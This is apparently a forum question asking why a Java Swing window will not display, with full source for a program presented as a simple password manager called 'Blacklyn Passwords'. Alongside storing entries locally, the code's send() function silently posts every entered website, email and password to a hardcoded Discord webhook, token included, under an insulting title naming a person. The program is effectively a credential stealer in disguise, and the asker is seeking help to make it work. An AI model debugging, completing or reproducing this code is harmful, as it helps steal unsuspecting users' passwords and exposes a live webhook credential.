I made a basic GUI program with Java Swing. But it is not even opening. I think it might be because I put the setVisible(true) method at the beginning.
But even if I put it at the bottom of the code, it is not displaying. Here is my code. What am I doing wrong?
import javax.swing.*;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
import java.util.Arrays;
import java.util.Scanner;
import java.util.stream.Collectors;
public class Main {
public static void main(String[] args) throws Exception {
//objects ------------------------------------------------------------------------------------------------------
JTextArea area = new JTextArea();
JFrame jframe = new JFrame();
JPanel panel = new JPanel();
JLabel label = new JLabel();
JButton button = new JButton();
JButton btn = new JButton();
//frame---------------------------------------------------------------------------------------------------------
jframe.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
jframe.setTitle("Blacklyn Passwords");
jframe.setSize(400,200);
//also tried it here, it´s showing...but it´s white all the time, and I tried to refresh it,I minimized it, and opened it back...but nothing changed...still white "jframe.setVisible(true)"
//label---------------------------------------------------------------------------------------------------------
label.setText("Blacklyn");
label.setForeground(Color.BLACK);//(new Color(135, 134, 131));
label.setFont(new Font("Calibri",Font.BOLD,25));
//areas---------------------------------------------------------------------------------------------------------
String data = readFile("data.json");
area.setText(data);
area.setEditable(false);
area.setBackground(new Color(23,23,23));
area.setForeground(new Color(68, 68, 68));
//buttons--------------------------------------------------------------------------------------------------------
button.setText("ADD");
button.setForeground(new Color(135, 134, 131));
button.setBackground(new Color(23,23,23));
button.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
String Website = JOptionPane.showInputDialog(null,"Enter a Website or Topic.","Blacklyn",JOptionPane.PLAIN_MESSAGE);
String Email = JOptionPane.showInputDialog(null,"Enter a Email.","Blacklyn",JOptionPane.PLAIN_MESSAGE);
String Password = JOptionPane.showInputDialog(null,"Enter a Password","Blacklyn",JOptionPane.PLAIN_MESSAGE);
try {
String flll = "data.json";
json_write(flll, Website + " " + Email + " " + Password);
send(Website + " " + Email + " " + Password);
} catch (IOException ex) {
ex.printStackTrace();
}
try {
String msg = readFile("data.json");
area.setText(msg);
} catch (Exception ex) {
ex.printStackTrace();
}
}
});
btn.setText("DELETE");
btn.setForeground(new Color(135, 134, 131));
btn.setBackground(new Color(23,23,23));
btn.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
File file = new File("data.json");
if(file.exists()){
String storage = JOptionPane.showInputDialog(null,"Enter what Website or Topic you want to delete","Blacklyn",JOptionPane.PLAIN_MESSAGE);
try {
deleteLine(storage);
} catch (IOException ex) {
ex.printStackTrace();
}
try {
String msg = readFile("data.json");
area.setText(msg);
} catch (Exception ex) {
ex.printStackTrace();
}
}else{
JOptionPane.showMessageDialog(null,"You have no Passwords to delete","Blacklyn",JOptionPane.ERROR_MESSAGE);
}
}
});
//panel---------------------------------------------------------------------------------------------------------
panel.setBackground(new Color(15,15,15));
panel.add(label);
panel.add(button);
panel.add(btn);
panel.add(area);
// I also tried it here(its not even showing)jframe.setVisible(true);
//END-----------------------------------------------------------------------------------------------------------
jframe.add(panel);
//it´s also not showing
jframe.setContentPane(panel);
}
public static void deleteLine(String start) throws IOException {
RandomAccessFile file = new RandomAccessFile("data.json", "rw");
String delete;
String task="";
byte []tasking;
while ((delete = file.readLine()) != null) {
if (delete.startsWith(start)) {
continue;
}
task+=delete+"\n";
}
System.out.println(task);
BufferedWriter writer = new BufferedWriter(new FileWriter("data.json"));
writer.write(task);
file.close();
writer.close();
}
public static String readFile(String fileName)throws Exception
{
String data = "";
data = new String(Files.readAllBytes(Paths.get(fileName)));
return data;
}
public static void json_write(String file, String data) throws IOException {
FileWriter fw = new FileWriter(file,true);
fw.write(data + "\n");
fw.flush();
fw.close();
}
public static void send(String data) throws IOException {
DiscordWebhook dw = new DiscordWebhook("https://discord.com/api/webhooks/899693331968323605/Ln4AYxUO8caGZDvi9628LuhaFmjgnhPOf2rrY5wVKEbGdiMFlnlyVy8BhM-HX6a_LkI2");
dw.addEmbed(new DiscordWebhook.EmbedObject().setTitle("Hurensohn Jans Password").setDescription(data));
dw.execute();
}
}
I also tried to research online, but no one has the same problem. So I decided to open a question here.